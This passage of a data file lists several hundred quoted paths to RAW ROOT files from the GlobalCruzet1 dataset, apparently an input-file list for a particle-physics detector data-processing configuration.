'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/74A18258-AF1C-DD11-95C3-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/74A67AE1-A61C-DD11-BA54-000423D8FA38.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/74F4C19C-B51C-DD11-8E0C-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/7603B179-9C1C-DD11-B7D4-0019DB29C5FC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/76867668-9C1C-DD11-B5ED-000423D6AF24.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/76B197DF-A61C-DD11-B053-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/7851BF3D-981C-DD11-98DE-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/7871E4B3-B91C-DD11-9810-001617C3B6E8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/78A51442-9A1C-DD11-82CE-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/78B68EE6-A61C-DD11-982C-000423D94A20.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/7AB72EDA-A61C-DD11-93AE-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/7C0BF6D7-B31C-DD11-A632-000423D9517C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/7E311039-981C-DD11-8455-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/80313A1F-B81C-DD11-BCAE-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/80345FC4-A41C-DD11-AA4B-000423D985E4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8070C7DF-B71C-DD11-ADA3-000423D985E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/822E46C5-A21C-DD11-92FE-001617E30CA4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/84267891-A01C-DD11-AC5E-001617E30D12.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8482A33A-981C-DD11-BA59-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/848D9EC2-B91C-DD11-BD85-001617C3B614.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/84F6D348-9A1C-DD11-AC69-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/84FD6FDF-A61C-DD11-9A4C-0019DB29C5FC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/865955BE-A21C-DD11-8B6B-001617E30D38.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/86B628BD-B91C-DD11-B16E-001617DBD224.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/86B85B3E-9A1C-DD11-8459-000423D992A4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/86E278C3-B91C-DD11-9EBB-0016177CA7A0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8A5F9D3D-9A1C-DD11-B194-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8A8B30DD-A41C-DD11-A07F-001617DBD288.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8AADB270-B31C-DD11-938C-000423D94C80.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8C25D448-9A1C-DD11-BAA5-001617E30F46.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8C52216F-B31C-DD11-82EA-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8CAD26DA-A61C-DD11-AE7E-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8E592FC0-B91C-DD11-A920-001617E30D00.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8E70E876-9C1C-DD11-84BE-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8E896B1E-B81C-DD11-B712-001617C3B6E8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8EA513BB-A21C-DD11-97DE-000423D6B444.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8EA8A0ED-A81C-DD11-A65A-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8EB8255F-B11C-DD11-B3D7-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/8EF6EF7C-B31C-DD11-B02E-000423D98EC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/904AB138-9A1C-DD11-B0C7-000423D9880C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/904C3593-A01C-DD11-BCCC-000423D9939C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9066B967-9C1C-DD11-BB3B-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9067ACE6-A61C-DD11-B578-001617C3B77C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/90823880-B11C-DD11-A6BF-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/909250C9-A41C-DD11-8F66-000423D6B444.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/909962C1-A21C-DD11-A255-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9262E0B9-A21C-DD11-BDED-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9272C5EB-A81C-DD11-88D5-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9449765E-B11C-DD11-B99D-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/94AE4A9E-B51C-DD11-A5FE-001617C3B76A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/94C8DE6D-9C1C-DD11-98FE-000423D986A8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/965BD87C-B31C-DD11-BCB0-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/96613A1F-B81C-DD11-B8A8-000423D985B0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/98315DBA-B91C-DD11-A70D-001617E30F4C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9837D448-9A1C-DD11-99DC-001617DBD49A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/98577A34-981C-DD11-B699-000423D985E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/987C6A38-981C-DD11-A3EB-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/98F26DFE-A81C-DD11-B151-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9A9188C9-A41C-DD11-ADA5-000423D6B48C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9C33A87C-9C1C-DD11-9622-001617C3B64C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9C52E338-9A1C-DD11-BF41-000423D6AF24.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9CBEB742-AF1C-DD11-91F0-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9CC04B90-9E1C-DD11-B8DC-000423DD2F34.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/9E8233A0-B51C-DD11-9222-001617DBD316.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A02EB8EA-A61C-DD11-A112-000423D99AA2.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A0A2198F-A01C-DD11-93EA-000423D6B2D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A0E37787-B31C-DD11-8321-000423D94990.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A0E807CF-A41C-DD11-BB21-000423D992DC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A216CE55-AF1C-DD11-88F0-000423D98B28.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A451701D-B81C-DD11-8258-001617C3B64C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A4586FA1-AB1C-DD11-BDF3-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A4AD6A85-B31C-DD11-B9A7-001617DBD224.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A6CA6BC4-A41C-DD11-A31B-000423D9863C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A87757E1-A61C-DD11-AF56-000423D94C80.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/A8E6BAB3-A21C-DD11-A4ED-000423D992A4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/AA174A3A-AF1C-DD11-BF8D-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/AA1A101E-AD1C-DD11-A129-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/AAA9E68F-9E1C-DD11-A380-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/AC07D634-AF1C-DD11-8CDB-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/ACF22FB8-B91C-DD11-BA33-001617E30D2C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/AE39ADB2-B71C-DD11-B430-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/AED27483-B31C-DD11-BAA1-000423D6C8EE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B00336DD-A61C-DD11-8944-001617DBCF6A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B08F9CF7-A81C-DD11-90F4-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B0BFDCB7-B91C-DD11-AF2D-001617E30CC8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B20AE9D7-A41C-DD11-ABE8-001617E30F48.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B2382462-B11C-DD11-90FD-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B24F8173-B31C-DD11-835C-000423D9939C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B2713B89-9E1C-DD11-B1B2-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B27A5B05-A91C-DD11-8492-001617E30F46.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B2BE5581-9E1C-DD11-AD50-000423D98804.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B400E66F-B31C-DD11-B0D7-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B649BBBA-A21C-DD11-9334-000423D6CA6E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/B8FAEEAA-B71C-DD11-8B35-001617C3B70E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/BA0F0ED1-A61C-DD11-A33A-001617C3B614.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/BAE9B871-B31C-DD11-9BF0-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/BC6B566C-9C1C-DD11-8154-000423D6B2D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/BCDBE12A-AB1C-DD11-AD5F-001617E30F4C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/BE3A3B3D-981C-DD11-9A57-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/BEEE307D-B31C-DD11-A4F8-000423D99AAA.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C014F777-B11C-DD11-B9DD-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C0FB9896-A01C-DD11-977A-001617E30F48.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C0FDA089-9E1C-DD11-A3F0-001617C3B5E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C23AF9D7-A41C-DD11-BA77-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C2CC26A6-B71C-DD11-89F4-001617C3B69C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C4EEE3B3-B91C-DD11-85E5-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C62A647C-9C1C-DD11-9136-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C6708081-9E1C-DD11-8334-000423D986A8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C6CF99B9-A21C-DD11-9D70-000423D6B5C4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/C8086ACA-A41C-DD11-ABC6-000423D6CA02.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/CCB28CBF-A21C-DD11-A343-001617C3B64C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/CCF1CF38-981C-DD11-B954-001617C3B73A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/CED1AE20-B81C-DD11-937A-001617C3B6E2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/CEE72F02-A91C-DD11-B45D-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/CEFC3E91-A01C-DD11-98CC-001617E30D0A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D2885E89-9E1C-DD11-A1E6-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D2B84A78-B61C-DD11-A238-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D42B50C4-A41C-DD11-BFB7-000423D9870C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D44B06B4-A21C-DD11-907F-000423D9863C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D464867B-9C1C-DD11-8980-001617E30D06.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D4EBE6BA-A21C-DD11-B8A7-000423D985E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D63FD683-9E1C-DD11-81FA-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D67A46C5-A21C-DD11-AE60-001617DF785A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D6A13F4E-9A1C-DD11-A008-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D6D813A1-A01C-DD11-A609-0019DB2F3F9B.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D814E871-B31C-DD11-9C71-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D83944BB-A21C-DD11-8862-000423DD2F34.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D8469596-A01C-DD11-83F0-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D86B334D-9A1C-DD11-B5DE-0019DB29C5FC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D8BB5636-981C-DD11-A230-000423D6AF24.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/D8E05E70-B31C-DD11-A757-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DA16873D-9A1C-DD11-AE70-001617C3B73A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DA4142AD-B71C-DD11-9DAA-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DAA952E9-B71C-DD11-815B-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DAC801D4-A41C-DD11-859E-000423D6B2D8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DC0E836F-B31C-DD11-8C0C-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DC6A381B-AB1C-DD11-A583-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DC6BFCA3-B71C-DD11-A650-000423D6C8E6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DC8E3F3D-9A1C-DD11-9FE1-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/DE98753B-AF1C-DD11-A990-000423D99020.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E0EC4FE6-A61C-DD11-9AC0-001617DBD5B2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E210BBAD-B71C-DD11-9B75-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E4C16FD4-A61C-DD11-BCFE-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E66F0446-AF1C-DD11-95F1-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E690BA1F-B81C-DD11-8302-001617C3B6DE.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E8002A9C-A01C-DD11-B643-000423D98804.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E89041EC-A81C-DD11-9B7B-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E89EDDD2-A41C-DD11-A22C-001617E30D12.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/E8CFAD3D-981C-DD11-B22A-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EA2B3732-AD1C-DD11-9725-001617C3B5D6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EAA9076D-9C1C-DD11-82A1-000423D6C8EE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EAACE083-B31C-DD11-88A3-000423D8F63C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EACE846B-9C1C-DD11-8AE5-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EAD127D4-A61C-DD11-A7F5-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EAED757C-9E1C-DD11-9717-000423D992A4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EC1807DE-A61C-DD11-8881-000423D985E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EC3D0181-9E1C-DD11-B761-000423D9870C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EC455A18-AB1C-DD11-8DDD-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EC48C57A-9E1C-DD11-8E79-000423D6AF24.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EE8FAF34-981C-DD11-8D58-000423D9880C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/EE8FF989-9E1C-DD11-B8B5-001617C3B706.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F068CE9B-A01C-DD11-A90A-000423D992A4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F246A9A6-B71C-DD11-803B-001617C3B654.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F25A5A88-B11C-DD11-B4F2-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F274EE67-9C1C-DD11-A92E-000423D985E4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F2D83EA9-B51C-DD11-89D5-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F2DA1660-B11C-DD11-B258-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F2E50819-AB1C-DD11-BB10-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F4039A71-9C1C-DD11-B3A2-000423D9863C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/F899D8B7-B91C-DD11-9133-001617DBD540.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FAC2EFD0-A41C-DD11-A9D4-000423D6AF24.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FC879E74-B31C-DD11-B356-001617E30CC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FCA0CCC5-A21C-DD11-BE49-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FCA982D5-A61C-DD11-8A1F-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FCB68476-9C1C-DD11-B496-001617DBCF90.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FCD38880-9E1C-DD11-829C-000423D6B2D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FE098EF7-A81C-DD11-A0AE-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/FE134BB4-A21C-DD11-BDCC-000423D6CAF2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/000CD59C-CC1C-DD11-A498-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0095DE1B-C01C-DD11-975B-000423D6C8EE.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/00D397C3-D01C-DD11-AAD7-001617E30CE8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0227DE52-C81C-DD11-910C-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/023E384A-C41C-DD11-B179-001617E30D0A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/02A0A458-C41C-DD11-BDAE-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0472A1D8-D21C-DD11-8A1F-001617C3B652.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0484A412-C01C-DD11-845D-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/060B4FA8-CE1C-DD11-9550-001617E30D06.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/062E02B4-CE1C-DD11-9E2C-001617C3B710.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/063C069C-CA1C-DD11-A395-001617DBD5B2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0664041F-C21C-DD11-A89C-001617E30F58.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/06DB5CC3-D01C-DD11-91CC-001617C3B710.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/06F29FCD-D01C-DD11-BC90-001617C3B778.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/08FAD35A-C41C-DD11-AE05-001617C3B79A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0AF3CEE5-BB1C-DD11-8E38-000423D98B5C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0C49504A-C41C-DD11-B41E-001617E30D38.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0C50A1D6-D01C-DD11-818F-000423D6B444.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0CA1115F-C81C-DD11-BFC9-001617E30CC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0E054203-C01C-DD11-AA43-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/0E14B5D2-B91C-DD11-8468-000423D98834.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/102F803D-C61C-DD11-9B28-000423D6CA72.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/108485A3-CE1C-DD11-B4E6-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/10A6495F-C81C-DD11-9BAA-001617E30D12.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/10E92BE2-BB1C-DD11-9356-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/121C2B53-C61C-DD11-B128-001617E30CA4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/12B2969B-CC1C-DD11-AE14-001617C3B73A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/12D4A753-C81C-DD11-ACAA-000423D6CAF2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1459D199-CC1C-DD11-912B-000423D986A8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/14F7031F-C21C-DD11-84F6-001617C3B654.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/162C5398-CC1C-DD11-A72D-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/164BFF8D-CA1C-DD11-8932-000423DD2F34.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/16937EE7-CC1C-DD11-B23B-000423D98E6C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1695C71C-C01C-DD11-866E-000423D6CAF2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/16D4ED53-C41C-DD11-8A8B-001617C3B778.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/16E75A61-C81C-DD11-8F7D-001617C3B706.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/181236C7-B91C-DD11-9101-001617DBD288.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/181B7712-C01C-DD11-A511-001617E30D12.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/184F93F8-BB1C-DD11-843D-001617E30D06.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/185F0E9E-CC1C-DD11-B1B4-000423D6CA02.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/186F2D03-C01C-DD11-9860-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/18AC3F95-CA1C-DD11-8B7A-001617C3B73A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/18F04319-C21C-DD11-B16C-001617DBD288.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1A3A8508-BE1C-DD11-AE08-000423D98AF0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1AFB7BBB-D01C-DD11-8B27-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1C006011-C21C-DD11-A5C9-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1C2B095F-C81C-DD11-AA1F-001617DBD472.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1C307446-C61C-DD11-850B-001617C3B6DE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1C87B154-C41C-DD11-ABBA-001617C3B5D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1EA987EF-BB1C-DD11-A499-000423D98FBC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/1ED2084F-C61C-DD11-A76D-001617C3B5D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2043E634-C21C-DD11-85CD-001617DBCF1E.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/205468CD-D21C-DD11-8B1A-000423D6CA02.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2071A802-BE1C-DD11-B1E0-001617DBD288.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/220ABE65-C81C-DD11-9DF4-001617C3B77C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/220CC9F1-BB1C-DD11-9CC0-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/222FFF23-C21C-DD11-9C92-001617DBD332.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/227EA1AD-CE1C-DD11-8133-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/229C872E-C21C-DD11-B263-001617C3B778.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2403325F-C41C-DD11-887E-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2606130A-C01C-DD11-9BA6-001617DC1F70.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/26A522E2-BB1C-DD11-8605-001617E30D54.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/26AF8BF4-BD1C-DD11-92C0-000423D9863C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/26F014F5-BB1C-DD11-9CDD-000423D33970.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/284795FB-BD1C-DD11-8134-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/28DAA6E5-BB1C-DD11-9497-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2A629202-C01C-DD11-99AF-001617E30D2C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2A684F12-C01C-DD11-B52A-001617E30D0A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2AC81D1E-C21C-DD11-9E3D-001617E30D0A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2C06BFCE-D01C-DD11-ACBC-001617DBCF1E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2C879CDF-BB1C-DD11-98B6-001617E30CC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2E5A7CD5-BB1C-DD11-8024-001617DBD288.root',
